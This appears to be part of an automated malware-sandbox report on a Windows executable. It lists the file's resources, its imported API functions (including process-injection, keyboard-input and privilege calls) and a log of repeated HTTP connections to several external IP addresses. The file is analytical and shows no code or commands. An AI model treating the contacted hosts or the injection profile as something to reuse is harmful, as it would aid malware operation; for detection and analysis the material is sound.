RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x566c9 | data | | | 1.0003276900955669
RT_GROUP_ICON | 0x122e84 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x122efc | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x122f10 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x122f24 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x122f38 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x123014 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                        Nov 21, 2024 16:21:24.512743950 CET4988780192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:24.512743950 CET4988780192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:24.592282057 CET8049887146.88.233.115192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:24.592746019 CET4988780192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:25.487941980 CET4989380192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:25.607609987 CET8049893146.88.233.115192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:25.607748985 CET4989380192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:25.623847961 CET4989380192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:25.744519949 CET8049893146.88.233.115192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:26.929130077 CET8049893146.88.233.115192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:26.929193020 CET8049893146.88.233.115192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:26.929236889 CET4989380192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:27.125509977 CET4989380192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:28.151855946 CET4989980192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:28.277292013 CET8049899146.88.233.115192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:28.277368069 CET4989980192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:28.293591022 CET4989980192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:28.415282965 CET8049899146.88.233.115192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:28.415430069 CET8049899146.88.233.115192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:29.617098093 CET8049899146.88.233.115192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:29.617131948 CET8049899146.88.233.115192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:29.617182016 CET4989980192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:29.816724062 CET4989980192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:30.833031893 CET4990580192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:30.952569962 CET8049905146.88.233.115192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:30.952672005 CET4990580192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:30.961869001 CET4990580192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:31.081645966 CET8049905146.88.233.115192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:32.302743912 CET8049905146.88.233.115192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:32.302788973 CET8049905146.88.233.115192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:32.303072929 CET4990580192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:32.305680037 CET4990580192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:32.425360918 CET8049905146.88.233.115192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:38.367644072 CET4992380192.168.2.9194.85.61.76
                                                                                                                        Nov 21, 2024 16:21:38.487737894 CET8049923194.85.61.76192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:38.491379976 CET4992380192.168.2.9194.85.61.76
                                                                                                                        Nov 21, 2024 16:21:38.504432917 CET4992380192.168.2.9194.85.61.76
                                                                                                                        Nov 21, 2024 16:21:38.625650883 CET8049923194.85.61.76192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:39.889962912 CET8049923194.85.61.76192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:39.889981031 CET8049923194.85.61.76192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:39.890266895 CET4992380192.168.2.9194.85.61.76
                                                                                                                        Nov 21, 2024 16:21:40.016119003 CET4992380192.168.2.9194.85.61.76
                                                                                                                        Nov 21, 2024 16:21:41.034982920 CET4993180192.168.2.9194.85.61.76
                                                                                                                        Nov 21, 2024 16:21:41.154762030 CET8049931194.85.61.76192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:41.154854059 CET4993180192.168.2.9194.85.61.76
                                                                                                                        Nov 21, 2024 16:21:41.176211119 CET4993180192.168.2.9194.85.61.76
                                                                                                                        Nov 21, 2024 16:21:41.295938969 CET8049931194.85.61.76192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:42.553632021 CET8049931194.85.61.76192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:42.553679943 CET8049931194.85.61.76192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:42.555881977 CET4993180192.168.2.9194.85.61.76
                                                                                                                        Nov 21, 2024 16:21:42.687531948 CET4993180192.168.2.9194.85.61.76
                                                                                                                        Nov 21, 2024 16:21:43.707825899 CET4993780192.168.2.9194.85.61.76
                                                                                                                        Nov 21, 2024 16:21:43.827665091 CET8049937194.85.61.76192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:43.831156969 CET4993780192.168.2.9194.85.61.76
                                                                                                                        Nov 21, 2024 16:21:43.847217083 CET4993780192.168.2.9194.85.61.76
                                                                                                                        Nov 21, 2024 16:21:43.966981888 CET8049937194.85.61.76192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:43.967040062 CET8049937194.85.61.76192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:45.235052109 CET8049937194.85.61.76192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:45.235248089 CET8049937194.85.61.76192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:45.235297918 CET4993780192.168.2.9194.85.61.76
                                                                                                                        Nov 21, 2024 16:21:45.359411001 CET4993780192.168.2.9194.85.61.76
                                                                                                                        Nov 21, 2024 16:21:46.380822897 CET4994380192.168.2.9194.85.61.76
                                                                                                                        Nov 21, 2024 16:21:46.500742912 CET8049943194.85.61.76192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:46.500852108 CET4994380192.168.2.9194.85.61.76
                                                                                                                        Nov 21, 2024 16:21:46.512809992 CET4994380192.168.2.9194.85.61.76
                                                                                                                        Nov 21, 2024 16:21:46.632621050 CET8049943194.85.61.76192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:47.856329918 CET8049943194.85.61.76192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:47.856400013 CET8049943194.85.61.76192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:47.856770039 CET4994380192.168.2.9194.85.61.76
                                                                                                                        Nov 21, 2024 16:21:47.859441996 CET4994380192.168.2.9194.85.61.76
                                                                                                                        Nov 21, 2024 16:21:47.979239941 CET8049943194.85.61.76192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:54.056814909 CET4996280192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:21:54.176455021 CET804996247.76.213.197192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:54.176621914 CET4996280192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:21:54.192934036 CET4996280192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:21:54.313132048 CET804996247.76.213.197192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:55.705440998 CET4996280192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:21:55.785877943 CET804996247.76.213.197192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:55.785943985 CET4996280192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:21:55.786135912 CET804996247.76.213.197192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:55.786175013 CET4996280192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:21:55.825201988 CET804996247.76.213.197192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:55.830846071 CET4996280192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:21:56.724656105 CET4996880192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:21:56.844270945 CET804996847.76.213.197192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:56.844397068 CET4996880192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:21:56.860708952 CET4996880192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:21:56.980374098 CET804996847.76.213.197192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:58.375174999 CET4996880192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:21:58.495728016 CET804996847.76.213.197192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:58.500408888 CET4996880192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:21:59.396534920 CET4997680192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:21:59.516318083 CET804997647.76.213.197192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:59.516634941 CET4997680192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:21:59.540168047 CET4997680192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:21:59.660033941 CET804997647.76.213.197192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:59.660059929 CET804997647.76.213.197192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:01.046936989 CET4997680192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:22:01.155646086 CET804997647.76.213.197192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:01.155709982 CET4997680192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:22:01.157191992 CET804997647.76.213.197192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:01.157239914 CET4997680192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:22:01.166526079 CET804997647.76.213.197192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:01.166568995 CET4997680192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:22:02.065810919 CET4998280192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:22:02.188232899 CET804998247.76.213.197192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:02.188359022 CET4998280192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:22:02.197689056 CET4998280192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:22:02.319577932 CET804998247.76.213.197192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:03.833364010 CET804998247.76.213.197192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:03.835283041 CET804998247.76.213.197192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:03.835439920 CET4998280192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:22:03.837954998 CET4998280192.168.2.947.76.213.197
                                                                                                                        Nov 21, 2024 16:22:03.963128090 CET804998247.76.213.197192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:09.492511988 CET4999580192.168.2.9208.91.197.27
                                                                                                                        Nov 21, 2024 16:22:09.612286091 CET8049995208.91.197.27192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:09.612379074 CET4999580192.168.2.9208.91.197.27
                                                                                                                        Nov 21, 2024 16:22:09.627998114 CET4999580192.168.2.9208.91.197.27
                                                                                                                        Nov 21, 2024 16:22:09.747759104 CET8049995208.91.197.27192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:10.817369938 CET8049995208.91.197.27192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:10.818986893 CET4999580192.168.2.9208.91.197.27
                                                                                                                        Nov 21, 2024 16:22:11.141154051 CET4999580192.168.2.9208.91.197.27
                                                                                                                        Nov 21, 2024 16:22:11.260926008 CET8049995208.91.197.27192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:12.159853935 CET4999680192.168.2.9208.91.197.27
                                                                                                                        Nov 21, 2024 16:22:12.279758930 CET8049996208.91.197.27192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:12.280026913 CET4999680192.168.2.9208.91.197.27
                                                                                                                        Nov 21, 2024 16:22:12.295471907 CET4999680192.168.2.9208.91.197.27
                                                                                                                        Nov 21, 2024 16:22:12.415203094 CET8049996208.91.197.27192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:13.446851015 CET8049996208.91.197.27192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:13.446908951 CET4999680192.168.2.9208.91.197.27
                                                                                                                        Nov 21, 2024 16:22:13.797041893 CET4999680192.168.2.9208.91.197.27
                                                                                                                        Nov 21, 2024 16:22:13.916738033 CET8049996208.91.197.27192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:14.819036007 CET4999780192.168.2.9208.91.197.27
                                                                                                                        Nov 21, 2024 16:22:14.945557117 CET8049997208.91.197.27192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:14.945790052 CET4999780192.168.2.9208.91.197.27
                                                                                                                        Nov 21, 2024 16:22:14.965322971 CET4999780192.168.2.9208.91.197.27
                                                                                                                        Nov 21, 2024 16:22:15.085712910 CET8049997208.91.197.27192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:15.085731983 CET8049997208.91.197.27192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:16.153628111 CET8049997208.91.197.27192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:16.153697014 CET4999780192.168.2.9208.91.197.27
                                                                                                                        Nov 21, 2024 16:22:16.469043970 CET4999780192.168.2.9208.91.197.27
                                                                                                                        Nov 21, 2024 16:22:16.588795900 CET8049997208.91.197.27192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:17.497910023 CET4999880192.168.2.9208.91.197.27
                                                                                                                        Nov 21, 2024 16:22:17.621743917 CET8049998208.91.197.27192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:17.621917963 CET4999880192.168.2.9208.91.197.27
                                                                                                                        Nov 21, 2024 16:22:17.631289959 CET4999880192.168.2.9208.91.197.27
                                                                                                                        Nov 21, 2024 16:22:17.752841949 CET8049998208.91.197.27192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:19.788412094 CET8049998208.91.197.27192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:19.788438082 CET8049998208.91.197.27192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:19.788454056 CET8049998208.91.197.27192.168.2.9
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Nov 21, 2024 16:22:19.788465977 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:19.788479090 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:19.788491964 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:19.788506031 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:19.788547993 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:19.788564920 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:19.788578033 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:19.788575888 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:19.788619041 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:19.908343077 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:19.908360958 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:19.911181927 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:19.989852905 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:19.990061998 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:19.992125988 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:19.994028091 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:19.994152069 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:19.994349003 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.002425909 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.002599955 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.004077911 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.010828018 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.010905981 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.013016939 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.019284964 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.019711018 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.025115967 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.027570009 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.027720928 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.027865887 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.035978079 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.036037922 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.036149979 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.044440985 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.044514894 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.049052000 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.052803040 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.052859068 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.055030107 CET  49998  80  192.168.2.9  208.91.197.27
